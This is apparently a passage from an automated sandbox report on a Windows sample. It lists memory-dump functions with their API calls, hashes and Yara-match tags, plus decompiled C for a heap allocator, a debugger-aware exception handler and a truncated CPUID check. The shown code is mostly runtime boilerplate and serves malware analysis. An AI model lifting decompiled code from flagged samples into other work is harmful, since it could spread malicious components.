Opcode ID: 7e4f31a6e53b580ac944892b7a8390e88b2770392bfee6068818ce37e27738d1
Instruction ID: bf1748db223673b5085f94ebda5ca9dac59b9bbfa42c763dbd2fc8130f207e1b
Opcode Fuzzy Hash: 7e4f31a6e53b580ac944892b7a8390e88b2770392bfee6068818ce37e27738d1
Instruction Fuzzy Hash: F851C2B1D102099FDB14CFA9D984ADEBFB2BF48314F24822AE819AB214D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 022CFBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a6014b8381be229b5a4f8483959c83e88dd436d3222152da51ff49b891e41a01
Instruction ID: 0d2e89bbc7404fe1a0257a645eff285ff29f6fcc72fa8d62b8c02a566fe67fab
Opcode Fuzzy Hash: a6014b8381be229b5a4f8483959c83e88dd436d3222152da51ff49b891e41a01
Instruction Fuzzy Hash: 6C41D1B1D10309DFDB14CF99C984ADEBBB6BF48314F24822AE819AB214D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050545F5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 050546B1

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ee1b4b1da322226f9a62d80b514596513811a96e6c37ee13e21959186336cdfc
Instruction ID: 3911393a0e8615753a6762dd58620a9736ec489e2cbe73efbcc52d2f2be6253a
Opcode Fuzzy Hash: ee1b4b1da322226f9a62d80b514596513811a96e6c37ee13e21959186336cdfc
Instruction Fuzzy Hash: 7D4102B1C0465CCADF24CFA9C9887DEBBB1BF49314F20805AD809AB250DB75594ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 05053474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 050546B1

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7166bf9327988c1bb26e9c641031b27e3a35a931f17ca5c030c80db4ea01832f
Instruction ID: 700a8e48372b2babf529c6998feea524d5d5df0838d263c5d49de36f260a56ad
Opcode Fuzzy Hash: 7166bf9327988c1bb26e9c641031b27e3a35a931f17ca5c030c80db4ea01832f
Instruction Fuzzy Hash: 3641F2B0C0465CCBDB24CFA9D9887DEBBF5BF49314F20806AD809AB250DB756945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05052470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05052531

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 261f53ffb4a58eafaae8225ceaf95634b34825fe24ddae23917f7fd704956253
Instruction ID: ddd7e82c88e0f440fbb505f6e2f2e7d6b86db20477bab3c6c44297c62964378e
Opcode Fuzzy Hash: 261f53ffb4a58eafaae8225ceaf95634b34825fe24ddae23917f7fd704956253
Instruction Fuzzy Hash: E9411AB8A002058FCB14CF99D448BAFBBF6FF88324F258459D919A7321D734A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0505B889, Relevance: 1.6, APIs: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0505B957

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: d77926d219e9c8a830aeba4315d08106048e8635fbccbdce8611ab23d677dba9
Instruction ID: 8cf3a13ddccd1c8a52ba149bcf18d5f2ccb854c73067ee30bb4d78c15ce4cee2
Opcode Fuzzy Hash: d77926d219e9c8a830aeba4315d08106048e8635fbccbdce8611ab23d677dba9
Instruction Fuzzy Hash: B831AD719042889FCB118FA9D844AEEBFF4EF59320F04805AE954A7261C339D855DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022CBCF8, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 38c12f7f0c8b678214d01b07905e0b3d0349c970a856f1d4f11629b0776e18dc
Instruction ID: b1289f787a386c3c629562d845e486eb2581e53df43a467fc70a0b90a614b26f
Opcode Fuzzy Hash: 38c12f7f0c8b678214d01b07905e0b3d0349c970a856f1d4f11629b0776e18dc
Instruction Fuzzy Hash: DC21F2B5D002489FDB10CFA9D984AEEFFF4EB48324F14815AE858A3210C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022CBD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1cb26e2a6aa6d9ae0b8484b35a5e196c7a6b568d9f52fc780095a160df0d9733
Instruction ID: 4db8b839c7a85915294d07fa8698d3f76d1f9bcb77e05191862bc7b2cb93cb9a
Opcode Fuzzy Hash: 1cb26e2a6aa6d9ae0b8484b35a5e196c7a6b568d9f52fc780095a160df0d9733
Instruction Fuzzy Hash: 0E21C4B5900209DFDB10CFA9D984ADEFBF4EB48324F14851AE958A3350D379A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022C7EEA, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 022C7F5D

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4589e85a68c4575353858ff6dc94441595e2a0c36b27ad2cc6eb8604985d3d25
Instruction ID: 6a7d3d72b304f7230da9f0a819609ea7ec900f66bb7178a46b2b25d42341999e
Opcode Fuzzy Hash: 4589e85a68c4575353858ff6dc94441595e2a0c36b27ad2cc6eb8604985d3d25
Instruction Fuzzy Hash: 7921DF708187888FDB11CFA4C5443EAFFF4EB0A324F14849ED494A7292C778A605CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022C8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 70b01e10303431ca3de36314010549ca363527fa77a524e871d8158a2eef1143
Instruction ID: 9b5be12a908005e80311535c12c6e54a547bb9eefdc723d2fb9cbdcdebfc0cfc
Opcode Fuzzy Hash: 70b01e10303431ca3de36314010549ca363527fa77a524e871d8158a2eef1143
Instruction Fuzzy Hash: 981103B69042099FDB10CF9AC448BEEFBF4EB88324F50852ED919B7610C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 022C9849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 846cce363ba298e3c39224211c71dc1373f22e33cf53e1c6d8770e18bb8cb5a8
Instruction ID: 66bf7456417f8c058857f84f95ee3858b655ce0b83097091662cc9e184219b9b
Opcode Fuzzy Hash: 846cce363ba298e3c39224211c71dc1373f22e33cf53e1c6d8770e18bb8cb5a8
Instruction Fuzzy Hash: AD2136B5D042498FCB10CFA9D444BEEFBF4AF88324F14852ED815A7200C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0505B8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0505B957

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 984d44e8772bf495d5e40ae9795c36de7987be8e7546cfa032bd669081fea815
Instruction ID: a56456f2bdbcfd3d1fe3c22364cd54bb9d325ca6ab25d94367c72858a5c94dab
Opcode Fuzzy Hash: 984d44e8772bf495d5e40ae9795c36de7987be8e7546cfa032bd669081fea815
Instruction Fuzzy Hash: 731123B59002499FDB10CFAAD944BDEBFF8EB48324F14841AE955A3260C339A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050532D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,009B53E8,00000000,?), ref: 0505E73D

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8bfaba6838788acc4af99dd6b26f45d10c583b614f15a8f4b2f40b4a8605ee52
Instruction ID: 9b73a641cd8591baa48882f6e05b1d98e7676508f0584147ade321128d1f8159
Opcode Fuzzy Hash: 8bfaba6838788acc4af99dd6b26f45d10c583b614f15a8f4b2f40b4a8605ee52
Instruction Fuzzy Hash: 511113B59002099FDB10CF99D985BEFBBF8EB48360F10845AE954A3250D378AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0505E6D8, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,009B53E8,00000000,?), ref: 0505E73D

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f303214b7ad844a8308e00709f3fdf1de9665b16c055326460258d898886b64a
Instruction ID: 9dbe6e102ecd6a27ad3193766b996b13dd82056cbd3be9bad1084dca3219061d
Opcode Fuzzy Hash: f303214b7ad844a8308e00709f3fdf1de9665b16c055326460258d898886b64a
Instruction Fuzzy Hash: A21158B58002499FDB10CFA9D985BEEFBF4FB48324F10845AD854A3250C379AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022CFE38, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 022CFE9D

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d08aa4b2ad53d47f2fabe6ab37c1533cd452be2e9f102f7d284f5bdcce8c1f6d
Instruction ID: 6501f4eb6077cbed4dfc0dfaa1b4fc9440ee1f3823eea263fa7f0212db4d2baa
Opcode Fuzzy Hash: d08aa4b2ad53d47f2fabe6ab37c1533cd452be2e9f102f7d284f5bdcce8c1f6d
Instruction Fuzzy Hash: 501125B59002489FDB10CF99D589BEEFBF4EB48324F20855AD859A3641C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022C95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c41ad8d40855746fa504f80c9b87e8dfaacd8e27bccc796fccc2d9f02fd89285
Instruction ID: 340a7eeca514a8b72b76baa5d5612b3151a206860388f512e50cd90f0cad6ff7
Opcode Fuzzy Hash: c41ad8d40855746fa504f80c9b87e8dfaacd8e27bccc796fccc2d9f02fd89285
Instruction Fuzzy Hash: B81110B5D006498FCB10CF9AC844BDEFBF4AB88324F20852ED829B7250C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05051540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0505226A,?,00000000,?), ref: 0505C435

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 52afc02a9ef360c37a2471b3bafbd9106cbfee708abef7d0dfebc11dc330c5e7
Instruction ID: e01e20ca27e6e19c17346e1580bf545ec6fd40be134e48a5352e85123a1adcce
Opcode Fuzzy Hash: 52afc02a9ef360c37a2471b3bafbd9106cbfee708abef7d0dfebc11dc330c5e7
Instruction Fuzzy Hash: F111F5B59007489FDB10CF99D984BEFBBF8FB48324F10841AE955A7610C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0505A548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0505BCBD

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 98d7fbea253f113b8cf65da0cce37b29a86ef7755442253932f6fa5f28449caa
Instruction ID: ec1b94a2679c68745d481a78d80db8a8d0275b6360d9903d7778517ffb9ef395
Opcode Fuzzy Hash: 98d7fbea253f113b8cf65da0cce37b29a86ef7755442253932f6fa5f28449caa
Instruction Fuzzy Hash: BF11E0B59006489FCB10CF99D988BDFBBF8EB48320F10841AE919A7210C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050550D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 0505D29D

Memory Dump Source

Source File: 00000001.00000002.508053417.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 57109cc38d4e1d6f9c938fb8c906b8b1594249d4c1e0006bad393d38948c56a4
Instruction ID: 2f1172f08053e9dacea03bdd1c48780daab448cff1c303690ab92c0a99977920
Opcode Fuzzy Hash: 57109cc38d4e1d6f9c938fb8c906b8b1594249d4c1e0006bad393d38948c56a4
Instruction Fuzzy Hash: E41106B59042089FDB10CF99D584BDFFBF8EB58320F10841AE915B7210C375AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022CFE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 022CFE9D

Memory Dump Source

Source File: 00000001.00000002.500296665.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 2e97c5d2fb29304cd08fa278bf2817273c084700c389300c577b60f9e4d3bb9c
Instruction ID: 1493ad4481e81f56c7b0188164c044ae014cb04c8efdd36baf10e80866d98e97
Opcode Fuzzy Hash: 2e97c5d2fb29304cd08fa278bf2817273c084700c389300c577b60f9e4d3bb9c
Instruction Fuzzy Hash: 7F1100B59002099FDB10CF99D588BDFFBF8EB88324F20855AD818A3640C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00403e3d
0x00403e43
0x00403e49
0x00403e7b
0x00403e80
0x00403e86
0x00000000
0x00403e86
0x00403e4d
0x00403e4f
0x00403e4f
0x00403e66
0x00403e6f
0x00403e77
0x00000000
0x00000000
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5c
0x00403e61
0x00403e62
0x00403e64
0x00000000
0x00000000
0x00403e64
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 005FD5B0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498882511.00000000005FD000.00000040.00000001.sdmp, Offset: 005FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea39655e8af4eb28cf4657bdd6dc01d83e085cc4554f617d877789e688c8610
Instruction ID: a6511a08d7d7ec89a7545cfd8b908d86457cd2ea2db28e6add1b441dceea5e9c
Opcode Fuzzy Hash: 6ea39655e8af4eb28cf4657bdd6dc01d83e085cc4554f617d877789e688c8610
Instruction Fuzzy Hash: F62106B1508248DFDB00DF10D9C4B36BF76FB88324F248569EA098B206C33AD855CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0060D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498948679.000000000060D000.00000040.00000001.sdmp, Offset: 0060D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957195fd18447631e969273943f20fee6fc7a709f9d26dc5c1555388d391b13b
Instruction ID: 1116f6b2ab6977d224ff7469cc79bf2bce1cabf1b4fed6269446d3ca37fd6ac9
Opcode Fuzzy Hash: 957195fd18447631e969273943f20fee6fc7a709f9d26dc5c1555388d391b13b
Instruction Fuzzy Hash: C021F570544244EFDB09CFA4D5C4B26BBA6FB84314F20CAADEA094B386C336D946CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0060D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498948679.000000000060D000.00000040.00000001.sdmp, Offset: 0060D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e594ef44b7655586e593e3c936c42e30d2243cf8af3333ab226cf672c3f3f302
Instruction ID: 018456aefde8dbbb45d3086753f437ad1dadabd341ae5714d93c5f66f83be10e
Opcode Fuzzy Hash: e594ef44b7655586e593e3c936c42e30d2243cf8af3333ab226cf672c3f3f302
Instruction Fuzzy Hash: AD21D374548244DFDB18CF64D9C4B27BB66EB84324F20CAA9D90E4B386C336D847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0060D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498948679.000000000060D000.00000040.00000001.sdmp, Offset: 0060D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aa27743da7d639ab0420700d6c8df46eadee35982e8ba381043b52b362e8a08
Instruction ID: 54c70b9dea93065803c75e3a464b445667548fe784fc18530cf288cdf085c062
Opcode Fuzzy Hash: 9aa27743da7d639ab0420700d6c8df46eadee35982e8ba381043b52b362e8a08
Instruction Fuzzy Hash: DC2180755493C08FCB16CF60D990756BF71EB46314F28C6DAD8498B697C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 005FD5AB, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498882511.00000000005FD000.00000040.00000001.sdmp, Offset: 005FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44d654c825a3ed173df7dc045a1876a97dd8016736f53a824db921536aced43
Instruction ID: e47bb66d31cd299eee964a3e6d355376a62e1b009a426dc75697bcb8839164bf
Opcode Fuzzy Hash: c44d654c825a3ed173df7dc045a1876a97dd8016736f53a824db921536aced43
Instruction Fuzzy Hash: 9A11D376404284CFCF11CF10D5C4B26BF72FB84324F24C6A9D9094B616C33AD856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0060D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498948679.000000000060D000.00000040.00000001.sdmp, Offset: 0060D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615d430dc8565199048cece872434a50d9c26320a5c945a63762a0d127949f75
Instruction ID: 8627ac5563355684afa56e5ee30fbaa0b78dc534e38f5def14d8c6a7b4b090e9
Opcode Fuzzy Hash: 615d430dc8565199048cece872434a50d9c26320a5c945a63762a0d127949f75
Instruction Fuzzy Hash: 7C11BB75944280DFCB15CF64C5C0B56BBA2FB84314F24C6AED9494B796C33AD80ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 005FD01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498882511.00000000005FD000.00000040.00000001.sdmp, Offset: 005FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a05c9a4eb91bbc0cd621b63b24289d56669da1737a22ddd97a2aff9fe1f979
Instruction ID: f5c67a65d0b4cb988c151010e49c3d1cbee4a9ee5918563df1adcacabb598421
Opcode Fuzzy Hash: 78a05c9a4eb91bbc0cd621b63b24289d56669da1737a22ddd97a2aff9fe1f979
Instruction Fuzzy Hash: 2301D471408248AAD7104E26D988777BFACFB41364F18845AEF085B242DB7D9845CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 005FD006, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.498882511.00000000005FD000.00000040.00000001.sdmp, Offset: 005FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b351e6151ced12b54b1b0d0673d282df6e4132b4303c31909ef887080308e8e
Instruction ID: efb57466616c3c74b04ccd3f7561f679624332e17fec105fd9ec39a1bb325e8f
Opcode Fuzzy Hash: 0b351e6151ced12b54b1b0d0673d282df6e4132b4303c31909ef887080308e8e
Instruction Fuzzy Hash: 7901526140D3C45FD7124B258C94762BFB8EF53224F1980DBD9888F193D2699C48C7B2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x324e58d2
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}

0x0040446f
0x0040446f
0x0040446f
0x0040447a
0x0040447f
0x00404481
0x00404488
0x00404489
0x0040448b
0x0040448e
0x00404493
0x00404493
0x0040449f
0x004044b2
0x004044c0
0x004044c6
0x004044cc
0x004044d2
0x004044d8
0x004044de
0x004044e4
0x004044ea
0x004044f0
0x004044f6
0x004044fd
0x00404504
0x0040450b
0x00404512
0x00404519
0x00404520
0x00404521
0x0040452a
0x00404530
0x00404533
0x00404539
0x00404546
0x0040454f
0x00404558
0x00404561
0x0040456f
0x00404571
0x0040457e
0x00404586
0x00404592
0x00404595
0x0040459a
0x004045a1
0x004045a9

APIs

IsDebuggerPresent.KERNEL32 ref: 00404567
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E

Memory Dump Source

Source File: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 0040208D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040208D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x412b2c =  *0x412b2c & 0x00000000;
				 *0x412030 =  *0x412030 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x412030 =  *0x412030 | 0x00000002;
				 *0x412b2c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
